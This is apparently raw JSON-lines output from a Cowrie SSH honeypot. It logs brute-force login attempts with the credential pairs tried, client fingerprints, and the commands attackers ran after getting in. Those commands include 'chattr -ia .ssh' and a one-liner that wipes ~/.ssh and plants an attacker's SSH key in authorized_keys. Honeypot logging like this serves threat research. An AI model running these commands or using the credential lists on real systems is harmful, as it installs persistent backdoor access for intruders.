{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:08:56.733099Z","src_ip":"212.227.235.229","session":"bd95ed91fcd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:08:57.038946Z","src_ip":"212.227.235.229","session":"bd95ed91fcd7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:08:58.275482Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:08:58.276184Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"M3gaP33!","message":"login attempt [uftp/M3gaP33!] failed","sensor":"my-vps","timestamp":"2025-08-28T16:08:58.305127Z","src_ip":"212.227.235.229","session":"bd95ed91fcd7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:59.614779Z","src_ip":"212.227.235.229","session":"bd95ed91fcd7"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:09:09.038590Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36172,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d3263ffa659","protocol":"ssh","message":"New connection: 212.227.235.229:36172 (1.2.3.4:22) [session: 2d3263ffa659]","sensor":"my-vps","timestamp":"2025-08-28T16:09:12.751464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:09:12.752414Z","src_ip":"212.227.235.229","session":"2d3263ffa659"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:09:12.969422Z","src_ip":"212.227.235.229","session":"2d3263ffa659"}
{"eventid":"cowrie.login.failed","username":"student1","password":"student1","message":"login attempt [student1/student1] failed","sensor":"my-vps","timestamp":"2025-08-28T16:09:13.877341Z","src_ip":"212.227.235.229","session":"2d3263ffa659"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:09:14.748307Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T16:09:14.749050Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:09:15.095509Z","src_ip":"212.227.235.229","session":"2d3263ffa659"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"3.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:09:18.124567Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.session.closed","duration":"24.5","message":"Connection lost after 24.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:09:18.125720Z","src_ip":"161.35.112.121","session":"c30a6e562cce"}
{"eventid":"cowrie.session.connect","src_ip":"161.35.112.121","src_port":51076,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d24d3981473","protocol":"ssh","message":"New connection: 161.35.112.121:51076 (1.2.3.4:22) [session: 4d24d3981473]","sensor":"my-vps","timestamp":"2025-08-28T16:09:29.659806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:09:37.087635Z","src_ip":"161.35.112.121","session":"4d24d3981473"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:09:37.088382Z","src_ip":"161.35.112.121","session":"4d24d3981473"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42637,"dst_ip":"1.2.3.4","dst_port":22,"session":"42967b11fcfa","protocol":"ssh","message":"New connection: 212.227.125.160:42637 (1.2.3.4:22) [session: 42967b11fcfa]","sensor":"my-vps","timestamp":"2025-08-28T16:09:47.622954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:09:47.623941Z","src_ip":"212.227.125.160","session":"42967b11fcfa"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:09:47.705127Z","src_ip":"212.227.125.160","session":"42967b11fcfa"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T16:09:48.108096Z","src_ip":"212.227.125.160","session":"42967b11fcfa"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:09:49.193945Z","src_ip":"212.227.125.160","session":"42967b11fcfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43486,"dst_ip":"1.2.3.4","dst_port":22,"session":"4674ab355779","protocol":"ssh","message":"New connection: 212.227.235.229:43486 (1.2.3.4:22) [session: 4674ab355779]","sensor":"my-vps","timestamp":"2025-08-28T16:09:59.584352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:09:59.585266Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:09:59.814375Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@abc","message":"login attempt [root/123456@abc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:00.772893Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:01.256192Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:01.257241Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:10:01.258619Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:01.489386Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:10:02.026746Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.028032Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.260309Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.261218Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44530,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1d9594f794f","protocol":"ssh","message":"New connection: 212.227.235.229:44530 (1.2.3.4:22) [session: d1d9594f794f]","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.478034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.478879Z","src_ip":"212.227.235.229","session":"d1d9594f794f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:02.698055Z","src_ip":"212.227.235.229","session":"d1d9594f794f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:10:03.613617Z","src_ip":"212.227.235.229","session":"d1d9594f794f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:04.837440Z","src_ip":"212.227.235.229","session":"d1d9594f794f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45382,"dst_ip":"1.2.3.4","dst_port":22,"session":"64216887c2e6","protocol":"ssh","message":"New connection: 212.227.235.229:45382 (1.2.3.4:22) [session: 64216887c2e6]","sensor":"my-vps","timestamp":"2025-08-28T16:10:05.089536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:10:05.090616Z","src_ip":"212.227.235.229","session":"64216887c2e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:10:05.332483Z","src_ip":"212.227.235.229","session":"64216887c2e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46261,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b98d687aee5","protocol":"ssh","message":"New connection: 212.227.235.229:46261 (1.2.3.4:22) [session: 7b98d687aee5]","sensor":"my-vps","timestamp":"2025-08-28T16:10:05.740680Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:05.741879Z","src_ip":"212.227.235.229","session":"7b98d687aee5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.341227Z","src_ip":"212.227.235.229","session":"64216887c2e6"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.573718Z","src_ip":"212.227.235.229","session":"4674ab355779"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.584917Z","src_ip":"212.227.235.229","session":"64216887c2e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46609,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9bd7e109295","protocol":"ssh","message":"New connection: 212.227.235.229:46609 (1.2.3.4:22) [session: c9bd7e109295]","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.840169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:10:06.841270Z","src_ip":"212.227.235.229","session":"c9bd7e109295"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp38